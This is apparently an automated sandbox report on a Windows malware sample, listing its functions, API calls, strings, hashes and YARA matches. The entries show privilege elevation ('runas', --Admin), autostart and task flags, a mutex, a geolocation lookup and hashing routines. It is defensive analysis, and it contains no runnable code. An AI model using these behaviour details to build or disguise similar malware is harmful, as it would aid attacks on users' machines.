                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _free_malloc_wprintf$_sprintf
                                                                                      • String ID:
                                                                                      • API String ID: 3721157643-0
                                                                                      • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                      • Instruction ID: e9a2529090696fa79b9b25889019aebb5e30cc8d7726f2b61091c70792384831
                                                                                      • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                      • Instruction Fuzzy Hash: 6A113AB65009643AC661A3B94C16FFF7BDCEF85702F0800BAFB5DD5183DA185A0493B2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084F210, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 217217746-3277548187
                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction ID: 50152bc14c2b8763035f6ca3dc8670079f38d6a838e941eea9ad3b3647c5d508
                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction Fuzzy Hash: ED515CB194020DAADF11DFA5DC46FEEBB78FB04704F104039FA05F6282D7B5AA058BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084F440, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                      • String ID: ^u
                                                                                      • API String ID: 217217746-3277548187
                                                                                      • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction ID: 5f85adee2abf1f7ed6b311cb6fe5f54fd0ca8f2245ac811ad32d30910d10edca
                                                                                      • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction Fuzzy Hash: DC518E71D40209AADF11DFA5CC46FEFBBB8FB04704F100039FA15F6181EA74AA058BA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 009066D9, Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __getptd_noexit.LIBCMT ref: 009066DD
                                                                                        • Part of subcall function 008659BF: __calloc_crt.LIBCMT ref: 008659E2
                                                                                        • Part of subcall function 008659BF: __initptd.LIBCMT ref: 00865A04
                                                                                      • __calloc_crt.LIBCMT ref: 00906700
                                                                                      • __get_sys_err_msg.LIBCMT ref: 0090671E
                                                                                      • __invoke_watson.LIBCMT ref: 0090673B
                                                                                      • __get_sys_err_msg.LIBCMT ref: 0090676D
                                                                                      • __invoke_watson.LIBCMT ref: 0090678B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                      • String ID:
                                                                                      • API String ID: 4066021419-0
                                                                                      • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                      • Instruction ID: ecbf033b0239f4899a02fc7a13e4caf1014e5fe77cd67d29d06933ba412f6632
                                                                                      • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                      • Instruction Fuzzy Hash: 0511C4326017146FEB21762DDC02ABF738CEF40764F110426FD48DA282E732DD2042D6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00862AD0, Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                      • String ID:
                                                                                      • API String ID: 1559183368-0
                                                                                      • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                      • Instruction ID: 2d3e01d75bf362032bd9832fca257f685710968eae8996b615a035281c416a28
                                                                                      • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                      • Instruction Fuzzy Hash: 7651C330A00B0ADBDB259F69888066E77B5FF40334F2687A9F835D62D0DB749D50DB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00852670, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: D
                                                                                      • API String ID: 2102423945-2746444292
                                                                                      • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                      • Instruction ID: bbfe2bf48be59de28dc210ac51ff6aee7de2674ab9abb4713081b1659473da5b
                                                                                      • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                      • Instruction Fuzzy Hash: CEE15C71D00219AACF24DBA4DD89FEEBBB8FF04305F1440A9E909E6190EB746A49CF55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084D8B0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: $$$(
                                                                                      • API String ID: 2102423945-3551151888
                                                                                      • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction ID: 39ba8c286534b72b088a6d15923d15481065cc0a134a9d2a8b12f2a983c5fee1
                                                                                      • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction Fuzzy Hash: 45919F71D0021C9AEF21CFA4DC5ABEEBBB4FF05304F244169E505BB281DBB65A48CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0088FBDE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::exception::exception.LIBCMT ref: 0088FBF1
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0088FC06
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                      • String ID: TeM$TeM
                                                                                      • API String ID: 3728558374-3870166017
                                                                                      • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction ID: bc927866261b58b21830ef725e61a80c2a429c546d5406d0ee7701bda1715e25
                                                                                      • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                      • Instruction Fuzzy Hash: 42D06775C0020CBBCF00EFA9D45ACDDBBB8EA14744B00C466A91897646EB74E3498B95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084D0E0, Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0086197D: __wfsopen.LIBCMT ref: 00861988
                                                                                      • _fgetws.LIBCMT ref: 0084D15C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __wfsopen_fgetws
                                                                                      • String ID:
                                                                                      • API String ID: 853134316-0
                                                                                      • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction ID: f45374dda3b33e58242347bcb3c9b77f42c3b399eff2f01433551c1c2cd14b12
                                                                                      • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                      • Instruction Fuzzy Hash: 45919E72D0031D9BCF21DFA8C885BAEB7B5FF14304F150529E815E7241E776AA08CBA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084D540, Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _malloc$__except_handler4_fprintf
                                                                                      • String ID:
                                                                                      • API String ID: 1783060780-0
                                                                                      • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                      • Instruction ID: f6e02dda12e279041ae9174eab9231aba2f575b0c442e802805b5e3fd86ee2e5
                                                                                      • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                      • Instruction Fuzzy Hash: 5CA160B1C0024CEBEF11EBD8D84ABDEBB75FF15304F140028E505BA292D7765A48CBA6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Analysis Process: NZPC0PFaC0.exe PID: 7112 Parent PID: 5344 NZPC0PFaC0.exeCOMMON

                                                                                      Executed Functions

                                                                                      Function 00419F90, Relevance: 176.6, APIs: 65, Strings: 35, Instructions: 1565COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                        • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                        • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                      • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                      • GetLastError.KERNEL32 ref: 00419FD2
                                                                                      • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                      • GetLastError.KERNEL32 ref: 00419FE4
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,0080DD20,?), ref: 0041A0BB
                                                                                      • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                      • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                        • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                        • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                        • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                      • String ID: IsNotAutoStart$ IsNotTask$%username%$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                      • API String ID: 2957410896-3144399390
                                                                                      • Opcode ID: 15b68a7a13bf0c1e1386151c75c3b37cb326e6516c5258aa6d0522fbbfdeb26f
                                                                                      • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                      • Opcode Fuzzy Hash: 15b68a7a13bf0c1e1386151c75c3b37cb326e6516c5258aa6d0522fbbfdeb26f
                                                                                      • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00412220, Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetCommandLineW.KERNEL32 ref: 00412235
                                                                                      • CommandLineToArgvW.SHELL32(00000000,?), ref: 00412240
                                                                                      • PathFindFileNameW.SHLWAPI(00000000), ref: 00412248
                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00412256
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041226A
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00412275
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00412280
                                                                                      • LoadLibraryW.KERNEL32(Psapi.dll), ref: 00412291
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041229F
                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004122AA
                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004122B5
                                                                                      • K32EnumProcesses.KERNEL32(?,0000A000,?), ref: 004122CD
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?), ref: 004122FE
                                                                                      • K32EnumProcessModules.KERNEL32(00000000,?,00000004,?), ref: 00412315
                                                                                      • K32GetModuleBaseNameW.KERNEL32(00000000,?,?,00000400), ref: 0041232C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00412347
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CommandEnumLibraryLineLoadNameProcess$ArgvBaseCloseFileFindHandleModuleModulesOpenPathProcesses
                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Psapi.dll$kernel32.dll
                                                                                      • API String ID: 3668891214-3807497772
                                                                                      • Opcode ID: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                      • Instruction ID: 197cd9f83d52dd112842658ec983a676e251e24b3cd7e802a51fbc3a937a58d5
                                                                                      • Opcode Fuzzy Hash: 2e762e749b316a475bae0755eecf3fc9a9c12245de4757d4cc138c5fb7e97d1c
                                                                                      • Instruction Fuzzy Hash: A3315371E0021DAFDB11AFE5DC45EEEBBB8FF45704F04406AF904E2190DA749A418FA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040CF10, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 228networkfileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _memset.LIBCMT ref: 0040CF4A
                                                                                      • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                      • InternetReadFile.WININET(00000000,?,00002800,?), ref: 0040CFCD
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDA
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040CFDD
                                                                                      Strings
                                                                                      • https://api.2ip.ua/geo.json, xrefs: 0040CF79
                                                                                      • "country_code":", xrefs: 0040CFE1
                                                                                      • Microsoft Internet Explorer, xrefs: 0040CF5A
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Internet$CloseHandleOpen$FileRead_memset
                                                                                      • String ID: "country_code":"$Microsoft Internet Explorer$https://api.2ip.ua/geo.json
                                                                                      • API String ID: 1485416377-2962370585
                                                                                      • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction ID: 63dc5d72282b855868e1768d03255ed744c0e271f8772f8e66d922d9032ce3a5
                                                                                      • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                      • Instruction Fuzzy Hash: 0F91B470D00218EBDF10DF90DD55BEEBBB4AF05308F14416AE4057B2C1DBBA5A89CB59
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00427F3D, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _doexit.LIBCMT ref: 00427F47
                                                                                        • Part of subcall function 00427E0E: __lock.LIBCMT ref: 00427E1C
                                                                                        • Part of subcall function 00427E0E: RtlDecodePointer.NTDLL(00507B08,0000001C,00427CFB,00423B69,00000001,00000000,i;B,00427C49,000000FF,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E5B
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E6C
                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E85
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(-00000004,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E95
                                                                                        • Part of subcall function 00427E0E: EncodePointer.KERNEL32(00000000,?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427E9B
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EB1
                                                                                        • Part of subcall function 00427E0E: DecodePointer.KERNEL32(?,00428B1A,00000011,i;B,?,004250D7,0000000D), ref: 00427EBC
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                      • String ID:
                                                                                      • API String ID: 2158581194-0
                                                                                      • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                      • Instruction ID: a7e7560d2adc556c6fb323ffd13f600db444db9a7111c1ec19eeb8b3048b151f
                                                                                      • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                      • Instruction Fuzzy Hash: ABB01271A8430C33DA113642FC03F053B0C4740B54F610071FA0C2C5E1A593B96040DD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 00410FC0, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                      • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                      • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                      • _memset.LIBCMT ref: 004110CA
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                      • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                      • _malloc.LIBCMT ref: 00411100
                                                                                      • _memset.LIBCMT ref: 0041110B
                                                                                      • _sprintf.LIBCMT ref: 0041112E
                                                                                      • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 2451520719-213608013
                                                                                      • Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                      • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                      • Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                      • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040E870, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                      • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                      • _memset.LIBCMT ref: 0040E98E
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                      • _sprintf.LIBCMT ref: 0040E9D3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 1084002244-213608013
                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                      • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040EAA0, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                      • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                      • _memset.LIBCMT ref: 0040EBB4
                                                                                      • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                      • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                      • _sprintf.LIBCMT ref: 0040EBF4
                                                                                      • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000A.00000002.332287808.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000A.00000002.332690727.0000000000529000.00000040.00000001.sdmp Download File
                                                                                      • Associated: 0000000A.00000002.332713787.000000000052B000.00000040.00000001.sdmp Download File
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                      • String ID: %.2X
                                                                                      • API String ID: 1637485200-213608013
                                                                                      • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                      • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                      • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
